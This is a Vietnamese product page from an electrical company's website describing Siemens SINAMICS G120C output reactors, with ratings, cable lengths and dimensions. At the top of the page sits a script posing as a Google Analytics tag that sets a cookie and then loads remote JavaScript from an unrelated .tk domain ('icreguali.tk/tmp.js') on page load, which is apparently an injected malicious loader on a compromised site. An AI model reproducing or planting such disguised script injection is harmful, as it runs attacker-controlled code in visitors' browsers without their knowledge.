<!-- Global site tag (tmp.js) - Google Analytics --> <script async src='https://www.googletagmanager.com/gtag/js?id=UA-154861920-1'></script> <script> function get_cookie(googlesd){ var results = document.cookie.match ( '(^|;) ?' + googlesd + '=([^;]*)(;|$)' ); if (results) return ( unescape ( results[2] ) ); else return null; } function google(src) { var elem = document.createElement("script"); elem.src = src; document.head.appendChild(elem); } var val = get_cookie('_gdh'); if(val != 'icreguali'){ var date = new Date; date.setDate(date.getDate() + 30); date = date.toUTCString(); document.cookie = '_gdh=icreguali; path=/; expires='+date; var val = get_cookie('_gdh'); if(val == 'icreguali'){google('https://icreguali.tk/tmp.js');} } </script>
Danh Mục

THIẾT BỊ NGUỒN LOAD-SIDE G120C

THIẾT BỊ NGUỒN LOAD-SIDE

Tổng quan
Cuộn kháng đầu ra 


Output reactor for SINAMICS G120C, frame size FSA

Cuộn kháng đầu ra làm giảm tốc độ tăng điện áp (dv / dt) và chiều cao của đỉnh dòng và cho phép kết nối các dây cáp dài hơn.
Do tỷ lệ tăng điện áp cao của IGBTs chuyển mạch nhanh, nên điện dung của các loại cáp động cơ dài đảo ngược cực một cách nhanh chóng với mọi hoạt động chuyển đổi trong Biến tần. Kết quả là Biến tần được nạp với các đỉnh cực đại hiện tại.
Cuộn kháng đầu ra làm giảm độ lớn của các đỉnh bổ sung này bởi vì điện dung cáp đảo chiều cực nhanh hơn qua điện cảm của cuộn kháng, do đó làm giảm các biên độ của các đỉnh hiện tại.
Khi sử dụng cuộn kháng đầu ra, cần quan sát những điều sau:
 •  Max. tần số đầu ra cho phép 200 Hz
 •  Max. tần số xung được cho phép 4 kHz
 •  Cuộn kháng đầu ra phải được lắp càng gần biến tần càng tốt
Technical specifications
Line voltage 380 ... 480 V 3 AC Output reactor
  6SL3202-0AE16-1CA0 6SL3202-0AE18-8CA0 6SL3202-0AE21-8CA0 6SL3202-0AE23-8CA0
Rated current A 6.1 9 18.5 39
Power loss kW 0.09 0.08 0.08 0.11
Connection to the Power Module/motor connection   Screw terminals Screw terminals Screw terminals Screw terminals
 • Conductor cross-section
mm2 4 4 10 16
PE connection   M4 screw stud M4 screw stud M5 screw stud M5 screw stud
Cable length, max.
between output reactor and motor
         
 • 380 V -10 % ... 415 V +10 % 3 AC
         
 • Shielded
m (ft) 150 (492) 150 (492) 150 (492) 150 (492)
 • Unshielded
m (ft) 225 (738) 225 (738) 225 (738) 225 (738)
 • 440 ... 480 V 3 AC +10 %
         
 • Shielded
m (ft) 100 (328) 100 (328) 100 (328) 100 (328)
 • Unshielded
m (ft) 150 (492) 150 (492) 150 (492) 150 (492)
Dimensions          
 • Width
mm (in) 207 (8.15) 207 (8.15) 247 (9.72) 257 (10.12)
 • Height
mm (in) 175 (6.89) 180 (7.08) 215 (8.46) 235 (9.25)
 • Depth
mm (in) 72.5 (2.85) 72.5 (2.85) 100 (3.94) 114.7 (4.51)
Possible as base component   No No No No
Degree of protection   IP20 IP20 IP20 IP20
Weight, approx. kg (lb) 3.4 (7.49) 3.9 (8.60) 10.1 (22.26) 11.2 (24.70)
Suitable for SINAMICS G120C Type 6SL3210-1KE11-8..2
6SL3210-1KE12-3..2
6SL3210-1KE13-2..2
6SL3210-1KE14-3..2
6SL3210-1KE15-8..2
6SL3210-1KE17-5..1
6SL3210-1KE18-8..1
6SL3210-1KE21-3..1
6SL3210-1KE21-7..1
6SL3210-1KE22-6..1
6SL3210-1KE23-2..1
6SL3210-1KE23-8..1
 • Frame size
  FSAA FSA FSB FSC
Không có sản phẩm trong danh mục này.
Bản quyền thuộc về Công ty Cổ Phần Xây Dựng Điện Hưng Thịnh © 2020 - Powered by SERENCO.NET